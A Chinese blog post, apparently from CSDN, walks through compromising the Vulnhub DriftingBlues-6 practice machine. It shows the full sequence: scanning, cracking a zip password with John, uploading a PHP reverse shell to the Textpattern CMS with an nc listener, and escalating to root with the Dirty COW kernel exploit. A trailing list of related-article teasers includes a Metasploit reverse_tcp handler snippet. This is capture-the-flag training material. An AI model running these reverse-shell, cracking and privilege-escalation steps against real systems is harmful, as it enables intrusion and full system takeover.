靶机渗透练习Vulnhub DriftingBlues-6

已于 2022-09-25 12:31:14 修改
阅读量1.4k 收藏
点赞数
文章标签: php 安全 网络 web安全
于 2022-09-25 12:27:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62584974/article/details/127036316
版权

攻击机ip

192.168.159.88

扫描主机

arp-scan -I eth0 -l

 得到靶机ip:

192.168.159.144

扫描端口

nmap -sS -A -sV -T4 -p- 192.168.159.144

 访问网页

192.168.159.144

 没发现什么有用的信息

目录扫描

 使用dirb发现了robots.txt和/textpattern/textpattern

dirb 192.168.159.144

扫描网站的后台 发现了robots.txt ,访问

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

发现禁止爬取,然后根据提示访问 /textpattern/textpattern 发现了登入后台

进入后台,访问

http://192.168.159.144/textpattern/textpattern/

但是我们没有账号和密码

使用工具gobuster寻找后缀为zip的目录

安装工具gobuster

apt-get install gobuster

安装seclists字典:

apt-get install seclists

扫描目录

gobuster dir -u “192.168.159.144” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

指纹识别出是Textpattern CMS

robots.txt中还有提示不要忘了zip,看到扫描结果中有 /spammer.zip,下载得到一个压缩包,尝试打开发现有密码

gobuster dir -u http://192.168.159.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

 访问

http://192.168.159.144/spammer.zip

得到一个有密码的zip文件

使用kali破解zip压缩包密码

 1.使用zip2john爆破得到zip密码

zip2john spammer.zip > password.txt

2.使用john破解

john password.txt

 得到密码

myspace4

解压zip文件

得到了一个用户名和密码

mayer:lionheart

用这个用户名和密码登入之前的网址

http://192.168.159.144/textpattern/textpattern/

进去后看到cms的版本是4.8.3

 思路一:kali本地搜索漏洞

searchsploit textpattern 4.8.3

 查看49620.py详细信息与使用方法

searchsploit -x php/webapps/49620.py

python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d

输入命令

因为回看脚本,他会自己给你加一个testpattern,所以url参数就不用加那么多textpattern了

python3 48943.py http://192.168.159.144/textpattern mayer lionheart

发现还是报错,用不了

思路二:寻找网站内的漏洞

在content那发现存在文件上传

在该处上传kali上的/usr/share/webshells/php/php-reverse-shell.php,上传前需要修ip和port 分别为攻击机ip和攻击机监听的tcp端口。

cd /usr/share/webshells/php

修改php

上传shell

 监听1234端口

nc -nlvp 1234

上传webshell

我们在admin管理界面可以看到上传地址 

访问

http://192.168.159.144/textpattern/files

 点击php-reverse-shell.php

回到kali已经监听成功

获得交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

脏牛提权

查看linux的版本信息

uname -a

内核版本>= 2.6.22 , 尝试脏牛提权

在github上下载提权脚本

https://github.com/FireFart/dirtycow

然后通过网站的文件上传漏洞解压后上传至后台

进入上传文件的文件夹

cd  /var/www/textpattern/files

进行编译,生成一个dirty的可执行文件

gcc -pthread dirty.c -o dirty -lcrypt

执行文件

./dirty

然后会让我们输入一个密码

 然后我们可以用用户名:firefart 密码:root

进入一个有root权限的用户

切换用户

su firefart

进入/root

cd /root

 得到flag.txt

参考文章

http://t.csdn.cn/nvjQG
http://t.csdn.cn/Jp7Ku
https://github.com/FireFart/dirtycow

墨言ink
关注
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3247
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1338
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-6
Aluxian_的博客
03-20 2247
Vulnhub靶机driftingblues6_vh渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:开始目录爆破:③:暴力破解zip:③:上传WebShell:④:脏牛提权:⑤:获取flag:Vulnhub靶机渗透总结: Vulnhub靶机介绍: Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/ Vulnhub靶机漏洞详解: ①:信息收集: kali里使用net
driftingblues6靶机(脏牛漏洞)
m0_66299232的博客
01-04 713
这段英文的意思是,警告“strftime():依赖系统的时区设置是不安全的。如果您使用了这些方法中的任何一种,并且仍然收到此警告,您很可能拼写错误了时区标识符。我们现在选择了时区“UTC”,但请设置date.timezone以选择您的时区。5.用unzip解压发现需要密码,那我们用fcrackzip,暴力破解。然后又改了密码,改完之后好像这个交互式界面又不能用了,也许命令在执行中。8.发现content下面的files能上传文件,上传我们的木马。6.正当我要上传dirty.c时,我的交互式界面不能用了。
靶机渗透练习06-driftingblues6
hirak0的博客
04-14 822
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-5,662/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
OSCP系列靶场-Esay-DriftingBlues6
杳若的博客
07-31 3518
OSCP系列靶场-Esay-DriftingBlues6
信息收集之敏感目录扫描
buffedon的博客
07-25 3217
信息收集之敏感目录扫描敏感目录扫描工具dirbwwwscancansinaWebdirscan敏感目录类型robots.txt 敏感目录扫描 敏感目录扫描能够得到其他网页的很多信息,找到后台管理页面,尝试进入后台,然后提升权限等 扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄露 工具 御剑,dirb,dirbuster,dirmap,dirsearch,wwwscan,cansina,Webdirscan 等 dirb wwwscan cansina Webdirscan dirbuster h
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
网络空间安全学习
04-20 2059
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
靶机渗透-Vulnhub-Gitroot
dahege666的博客
05-20 446
靶机IP:172.16.10.103 攻击机IP:172.16.10.106 1、扫描目标主机端口 2、访问80端口 3、修改hosts文件,添加172.16.10.106 gitroot.vuln,顺便也把主域名绑定 4、绑定域名后访问子域, 5、对beth用户进行弱口令没结果,wp-scan扫一下也没什么东西 6、扫描子域名 7、访问一下第二个子域名,hosts绑定,提示这里存储了一堆代码 8、扫一下目录,发现存在git源码泄露,使用githack下载下
靶机渗透-Vulnhub-DC-2
dahege666的博客
01-21 408
下载地址: 1、链接:https://pan.baidu.com/s/1cl5-9SrevaFehfS4lY4w5w 提取码:7ahw 2、http://www.five86.com/downloads/DC-2.zip 3、https://download.vulnhub.com/dc/DC-2.zip 靶机:DC2(VMware桥接) IP:192.168.88.123 攻击机:Kali(VMware桥接) IP:192.168..88.109 测试之前需要修改一下hos...
dirtycow(脏牛提权)靶机渗透测试
yqa957的博客
03-12 2635
nmap扫描存活主机 nmap -sn 192.168.233.0/24 发现靶机192.168.233.133 扫描端口 nmap -sV -sC -sT -p- 192.168.233.133 御剑扫描 注入测试 手工注入—>确定注入点 判断列数 使用union all 手工注 查找对应位置 http://192.168.233.133/storypage_04.php?id=...
什么是.ink 域名?.ink 域名有什么价值优势?
老刀专栏
11-21 4001
现在域名的种类比较多,很多人在注册域名时不知道怎么去选择,经常有人咨询我们:.ink 域名是否值得注册。什么是.ink 域名?.ink 域名有什么价值优势?下面大家就来看看文章一起了解下吧。 一、什么是.ink域名? .ink是国际新通用顶级域名(New Generic Top-level Domain 简称 New gTLD) 。目前GOOGLE、微软、百度、苹果等国际知名企业已入驻保护。ink英文释义为“墨水”“签名(签订合同)”,以其为后缀的单词有think·思考,pink·顶点、极度、典范,blin
kali中john破解压缩包密码
weixin_55631415的博客
12-29 3470
zip2john [选项] zip文件 > hash。2.john破解中间Hash文件。
[代码审计]Textpattern4.8.4任意文件上传漏洞
Y4tacker的博客
04-25 752
在网上看到的公开不久,自己无聊随意进行分析一下啦 利用点在后台上传插件的地方 从这里跟踪发现其调用了plugin_upload函数 照顾小白加一点批注吧 function plugin_upload() { $plugin = array(); if ($_FILES["theplugin"]["name"]) { //获取上传表单 $filename = $_FILES["theplugin"]["name"]; $source = $_FIL
DirtyCow(脏牛)漏洞复现
热门推荐
Brucetg的博客
08-20 2万+
该文章首发于: 90sec(九零) 文章链接: https://forum.90sec.com/t/topic/521 这几天发现90sec需要登录才能浏览文章,为了方便就把该文章也发在个人博客,并顺便把之前编译好的脏牛提权EXP也一块放出来。 编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP 该漏洞是 Linux 内核的内存子...
Vulnhub靶机driftingblues6_vh
weixin_43967893的博客
04-19 779
Vulnhub_driftingblues6 zip破解,php_reverse,脏牛提权
靶机渗透练习06-driftingblues6 (利用脏牛提权)
Force~
03-29 1523
靶机地址: https://www.vulnhub.com/entry/driftingblues-6,672/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -s.
vulnhub靶机 driftingblues2
最新发布
01-04
### 关于VulnHub DriftingBlues2靶机详情 #### 靶机概述 DriftingBlues系列是VulnHub平台上提供给安全爱好者练习渗透测试技能的一组虚拟机镜像。这些靶机设计用于帮助用户提升其在网络攻防方面的能力,特别是针对Web应用的安全评估技巧。 对于特定的`DriftingBlues: 2`版本而言,此靶机旨在模拟真实世界中的信息系统环境,并设置了多个层次的任务来挑战玩家的技术水平[^4]。 #### 渗透测试流程 ##### 信息收集阶段 在这个过程中,首要任务是从外部视角了解目标系统的开放服务及其配置情况。通常采用的方法包括但不限于: - **主机发现**:通过网络扫描工具(如Nmap)识别活动主机并确定其IP地址范围。 - **端口和服务枚举**:进一步探测已知存活节点上的可用端口以及运行的服务类型和版本号。 由于`DriftingBlues: 2`的具体内部结构未完全公开,在实际操作前需自行探索更多细节以制定后续行动计划。 ##### 漏洞利用实践 一旦完成了初步的情报搜集工作,则可以根据所获数据选择合适的攻击向量实施入侵行为。例如,如果发现了某个存在已知漏洞的应用程序实例,则可考虑运用Metasploit Framework (MSF) 或其他自动化平台来进行针对性打击。 值得注意的是,在处理此类实验性质较强的项目时,建议遵循官方指南或社区分享的经验贴作为参考依据,以便更高效地完成整个过程[^5]。 ```bash # 使用Nmap进行基本的TCP SYN扫描 nmap -sS <target_ip> # 利用Metasploit加载exploit模块 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST <your_local_IP> run ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值